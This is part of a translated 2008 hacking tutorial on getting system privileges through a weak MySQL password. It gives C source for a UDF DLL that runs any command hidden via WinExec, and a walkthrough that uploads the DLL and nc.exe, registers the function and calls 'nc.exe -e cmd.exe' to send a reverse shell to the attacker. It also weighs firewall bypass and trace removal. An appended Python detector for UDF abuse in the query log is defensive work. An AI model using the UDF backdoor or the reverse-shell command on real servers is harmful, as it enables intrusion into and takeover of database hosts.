Teaching you how to obtain system privileges through a MySQL weak password (3)
  Add date: 10/08/2008   Publishing date: 10/08/2008
After a while, you have a shell with system privileges.
Because it is the version that hooks recv, its ability to get through a firewall is very strong. I only used it after the earlier mix.dll reverse connection had failed, and it really lived up to expectations! After entering the system, I discovered that it had two network cards and the Tianwang (SkyNet) personal firewall V2.73, with only port 3306 open to the outside. From this it can be seen that my_udf.dll really does have a very strong ability to get through a firewall! But it also has a bug: once we have connected and activated this function (that is, after using the command "select my_udfdoor('');"), then whether or not you are connected, as soon as you execute:
mysql> drop function my_udfdoor;
MySQL reports an error and then hangs.

Therefore, with this DLL file you cannot delete your traces!
Finally, let us write a custom DLL file ourselves and see whether that solves the problem.

We simply use the UDF example that comes with MySQL as a template! Look at its example:
#include <stdlib.h>
#include <winsock.h>
#include <mysql.h>
extern "C" {
char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,
              char *error);
// C-compatible linkage
}
char *my_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null,
              char *error)
{
    char *me = "my name";
    return me;
    // calling this UDF returns "my name"
}
Very simple, isn't it? Good, we only need to change it slightly to get our own DLL file.
Below is the revision by Crackme:
#include <stdlib.h>
#include <windows.h>
#include "mysql.h"
extern "C" __declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error); // sys_name is the function name; you may change it as you like
__declspec(dllexport) char *sys_name(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) // sys_name must be changed here as well!
{
    char me[256] = {0};
    if (args->arg_count == 1) {
        strncpy(me, args->args[0], args->lengths[0]);
        me[args->lengths[0]] = '\0';
        WinExec(me, SW_HIDE); // use it to execute an arbitrary command
    } else
        strcpy(me, "do nonthing.\n");
    return me;
}
Good, we compile it into the sysudf.dll file and that is all! Let us test it!
Watch the walkthrough:
mysql> \. C:\sysudf.dll.txt
mysql> Create function sys_name returns string soname 'C:\\windows\\sysudf.dll';
mysql> \. Nc.exe.txt // also uploads nc.exe
mysql> select sys_name('nc.exe -e cmd.exe my ip 8080');
// sys_name takes only one argument, which specifies the system command to execute
Good, have a look at the shell bounced back from Win2003.
Of course, you may also choose not to bounce a shell and carry out other commands instead. However, whether or not the command is carried out successfully, nothing is returned to show it, so you must make sure that the format of the command is correct. As for this DLL file, testing shows that "drop function sys_name;" does not report an error no matter when it is run, and that different commands can also be run many times. As for its shortcoming, its ability to get through a firewall is not as strong as that of Mix.dll; but when there is no real need to get through a firewall, running other commands directly is the best choice.
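
Seen from the defending side, the steps above leave a recognisable sequence in the MySQL general query log: a CREATE FUNCTION ... SONAME statement naming an unfamiliar library, calls to the new function, then a DROP FUNCTION. The following detection sketch is an added example, not code from the original article; it assumes the general query log is enabled, and the log lines, the allowlist and the scan() helper are constructed for illustration.

```python
import re

# Constructed log lines in the style of the MySQL general query log,
# modelled on the statements shown in the article (addresses are placeholders).
SAMPLE_LOG = [
    r"081008 10:01:12  41 Connect  root@203.0.113.7 on",
    r"081008 10:01:15  41 Query    select version()",
    r"081008 10:02:40  41 Query    Create function sys_name returns string soname 'C:\\windows\\sysudf.dll'",
    r"081008 10:03:05  41 Query    select sys_name('cmd.exe /c whoami')",
    r"081008 10:09:51  41 Query    drop function sys_name",
    r"081008 10:11:00  42 Query    select name from customers where id = 7",
]

CREATE_RE = re.compile(
    r"\bcreate\s+(?:aggregate\s+)?function\s+`?(\w+)`?\s+returns\s+\w+"
    r"\s+soname\s+'([^']+)'", re.I)
DROP_RE = re.compile(r"\bdrop\s+function\s+(?:if\s+exists\s+)?`?(\w+)`?", re.I)

# Assumption: a site-specific allowlist of UDF libraries you installed yourself.
ALLOWED_LIBS = frozenset()

def scan(lines, allowed=ALLOWED_LIBS):
    """Return (line_no, event, udf_name, detail) for UDF load, call and drop."""
    udfs, findings = {}, []          # udfs: function name -> library it came from
    for n, line in enumerate(lines, 1):
        m = CREATE_RE.search(line)
        if m:
            name, lib = m.group(1).lower(), m.group(2)
            if re.split(r"[\\/]+", lib)[-1].lower() not in allowed:
                udfs[name] = lib
                findings.append((n, "udf_registered", name, lib))
            continue
        m = DROP_RE.search(line)
        if m and m.group(1).lower() in udfs:
            name = m.group(1).lower()
            findings.append((n, "udf_dropped", name, udfs.pop(name)))
            continue
        for name in udfs:            # calls to a UDF registered earlier in this log
            call = re.search(r"\b%s\s*\(\s*'([^']*)'" % re.escape(name), line, re.I)
            if call:
                findings.append((n, "udf_called", name, call.group(1)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On a live server the same inventory can be read from the mysql.func table (columns name and dl), which lists every registered UDF and the library it was loaded from.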

 